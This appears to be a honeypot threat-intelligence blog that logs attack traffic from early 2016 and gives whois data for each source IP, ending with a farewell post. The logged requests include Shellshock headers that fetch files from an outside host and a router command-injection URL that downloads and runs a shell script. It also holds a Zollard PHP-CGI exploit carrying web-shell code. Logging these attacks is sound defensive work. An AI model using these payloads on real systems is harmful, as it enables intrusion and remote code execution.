end of life

Good morning,

as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots have had some issues.

The vservers will be going down soon. So no more analytics.

Thanks to Swen for having the Germany running for so long. I am currently looking for cheap vservers in the world and talks to some people about funding the operation costs, until than....

This is the end

159.226.162.196 - #perl wget via 204.232.209.188

BEGIN OF HTTP DATA:
2016-02-11 19:15:33
Source IP: 159.226.162.196
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 109.234.106.8
Connection: Close


 END OF DATA

The http server returned 404 at the time of the investigation

Copyright (c) 2015,2016, Joerg Stephan All rights reserved. Disclaimer:This information is provided as-is and there is no guarantee that blocking an IP or domain reported in this overview will not adversely impact your business. Use all information provided on your own risk, the author disclaims all warranty and shall not be liable for any damage or impact caused.

159.226.162[.]196 Whois Data (TeamCymru) AS : 7497 IP : 159.226.162.196 BGP Prefix : 159.226.162.0/24 CC : CN Registry : apnic Allocated : AS Name: CSTNET-AS-AP Computer Network Information Center,CN http://www.team-cymru.org/IP-ASN-mapping.html#whois 204.232.209[.]188 Whois Data (TeamCymru) AS : 33070 IP : 204.232.209.188 BGP Prefix : 204.232.192.0/19 CC : US Registry : arin Allocated : 2009-06-24 AS Name: RMH-14 - Rackspace Hosting,US http://www.team-cymru.org/IP-ASN-mapping.html#whois Source: Local Feed Database Title: 213.136.72.84 . shellshock perl via 204.232.209.188 Reference: http://sendmespamids.blogspot.com/2016/01/2131367284-shellshock-perl-via.html In db since: 2016-01-22 08:36:12.295000

178.57.115.231 - (Russian IPs) possible DD-WRT firmware via 178.57.115.231:8081

BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080

 END OF DATA

The ug.sh tries to download an binary file





 Just by taking a look of the xxd and strings output of the file, it looks like an DD-WRT firmware file.

Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.

Disclaimer:This information is provided as-is and there is no guarantee
that blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided on your own risk,
the author disclaims all warranty and shall not be liable for any damage
or impact caused.

178.57.115[.]231

Whois Data (TeamCymru)
• AS : 60139
• IP : 178.57.115.231
• BGP Prefix : 178.57.112.0/21
• CC : RU
• Registry : ripencc
• Allocated : 2010-02-02
• AS Name: Z-TELECOM Z-Telecom Ltd,RU
• http://www.team-cymru.org/IP-ASN-mapping.html#whois

178.57.115[.]231

Whois Data (TeamCymru)
• AS : 60139
• IP : 178.57.115.231
• BGP Prefix : 178.57.112.0/21
• CC : RU
• Registry : ripencc
• Allocated : 2010-02-02
• AS Name: Z-TELECOM Z-Telecom Ltd,RU
• http://www.team-cymru.org/IP-ASN-mapping.html#whois

61.49.45.47 - WhatWeb/0.4.8-dev (first time seen)

BEGIN OF HTTP DATA:
2016-01-23 16:47:13
Source IP: 61.49.45.47
GET / HTTP/1.1
User-Agent: WhatWeb/0.4.8-dev
Host: 109.234.106.8:8080
Connection: close
Accept: */*

 For more information https://user-agents.me/crawler/whatweb048-dev
According to some news in the web, this crawler is meant to identify the running webpages on a server.

61.49.45[.]47

Whois Data (TeamCymru)
• AS : 4808
• IP : 61.49.45.47
• BGP Prefix : 61.49.0.0/18
• CC : CN
• Registry : apnic
• Allocated : 2001-06-28
• AS Name: CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network,CN
• http://www.team-cymru.org/IP-ASN-mapping.html#whois

Dynamic Source: SANS Internet Storm Cast
• comment:IP is listed on SANS ISC
• Reference: https://isc.sans.edu/api/ip/61.49.45.47

213.136.72.84 . Shellshock perl via 204.232.209.188

BEGIN OF HTTP DATA:
2016-01-20 09:58:59
Source IP: 213.136.72.84
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 195.169.125.87
Connection: Close


 END OF DATA

213.136.72[.]84 Whois Data (TeamCymru) AS : 51167 IP : 213.136.72.84 BGP Prefix : 213.136.72.0/23 CC : DE Registry : ripencc Allocated : 2000-02-28 AS Name: CONTABO Contabo GmbH,DE http://www.team-cymru.org/IP-ASN-mapping.html#whois Dynamic Source: IBM X-Force Exchange Score: 10 Reference: https://exchange.xforce.ibmcloud.com/ip/213.136.72.84 Dynamic Source: SANS Internet Storm Cast comment:IP is listed on SANS ISC Reference: https://isc.sans.edu/api/ip/213.136.72.84 204.232.209[.]188 Whois Data (TeamCymru) AS : 33070 IP : 204.232.209.188 BGP Prefix : 204.232.192.0/19 CC : US Registry : arin Allocated : 2009-06-24 AS Name: RMH-14 - Rackspace Hosting,US http://www.team-cymru.org/IP-ASN-mapping.html#whois

92.45.197.218 - Zollard php execution

BEGIN OF HTTP DATA:
2016-01-21 09:47:25
Source IP: 92.45.197.218
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F
%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%6
9%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%
66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63
%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1817
Connection: close

<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disabl

END OF DATA

Sadly the request was to long to be fully logged by the fake HTTP server

The POST messages is

POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1

92.45.197[.]218

Whois Data (TeamCymru)
• AS : 34984
• IP : 92.45.197.218
• BGP Prefix : 92.45.196.0/23
• CC : TR
• Registry : ripencc
• Allocated : 2007-12-17
• AS Name: TELLCOM-AS TELLCOM ILETISIM HIZMETLERI A.S.,TR
• http://www.team-cymru.org/IP-ASN-mapping.html#whois

 

Scanner seen on January 14, 2016

• 185.130.5.207 - muieblackcat
• 37.142.32.222 - masscan/1.0
• 149.78.19.136 -  masscan/1.0
• 195.169.125.87 -  zgrab/0.x 
• 185.130.5.235 -  muieblackcat

185.130.5[.]207 Whois Data (TeamCymru) AS : 203569 IP : 185.130.5.207 BGP Prefix : 185.130.5.0/24 CC : LT Registry : ripencc Allocated : 2015-12-04 AS Name: SILK-AS Sindicate Group Ltd,LT http://www.team-cymru.org/IP-ASN-mapping.html#whois Dynamic Source: IBM X-Force Exchange Score: 10 Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.207 Dynamic Source: SANS Internet Storm Cast comment:IP is listed on SANS ISC Reference: https://isc.sans.edu/api/ip/185.130.5.207 Static Source: panwdbl.appspot.com Comment: Listed in open blacklist Reference: https://panwdbl.appspot.com/lists/openbl.txt Static Source: http://sendmespamids.blogspot.nl/ Blacklist Comment: Listed on Honeypot blacklist Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt 37.142.32[.]222 Whois Data (TeamCymru) AS : 12849 IP : 37.142.32.222 BGP Prefix : 37.142.32.0/22 CC : IL Registry : ripencc Allocated : 2012-02-29 AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL http://www.team-cymru.org/IP-ASN-mapping.html#whois Dynamic Source: SANS Internet Storm Cast comment:IP is listed on SANS ISC Reference: https://isc.sans.edu/api/ip/37.142.32.222 149.78.19[.]136 Whois Data (TeamCymru) AS : 12849 IP : 149.78.19.136 BGP Prefix : 149.78.0.0/19 CC : US Registry : arin Allocated : AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL http://www.team-cymru.org/IP-ASN-mapping.html#whois Dynamic Source: IBM X-Force Exchange Score: 10 Reference: https://exchange.xforce.ibmcloud.com/ip/149.78.19.136 Dynamic Source: SANS Internet Storm Cast comment:IP is listed on SANS ISC Reference: https://isc.sans.edu/api/ip/149.78.19.136 Static Source: http://sendmespamids.blogspot.nl/ Blacklist Comment: Listed on Honeypot blacklist Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt 195.169.125[.]87 Whois Data (TeamCymru) AS : 1103 IP : 195.169.125.87 BGP Prefix : 195.169.125.0/24 CC : NL Registry : ripencc Allocated : AS Name: SURFNET-NL SURFnet, The Netherlands,NL http://www.team-cymru.org/IP-ASN-mapping.html#whois Source: Local Feed Database Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html In db since: 2015-09-24 08:17:16.658000 Source: Local Feed Database Title: 46.172.71.251, 195.169.125.87 - to ping 212.47.238.143 Reference: http://sendmespamids.blogspot.com/2016/01/4617271251-19516912587-to-ping.html In db since: 2016-01-09 11:54:24.541062 185.130.5[.]235 Whois Data (TeamCymru) AS : 203569 IP : 185.130.5.235 BGP Prefix : 185.130.5.0/24 CC : LT Registry : ripencc Allocated : 2015-12-04 AS Name: SILK-AS Sindicate Group Ltd,LT http://www.team-cymru.org/IP-ASN-mapping.html#whois Dynamic Source: IBM X-Force Exchange Score: 10 Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.235 Dynamic Source: SANS Internet Storm Cast comment:IP is listed on SANS ISC Reference: https://isc.sans.edu/api/ip/185.130.5.235 Static Source: panwdbl.appspot.com Comment: Listed in open blacklist Reference: https://panwdbl.appspot.com/lists/openbl.txt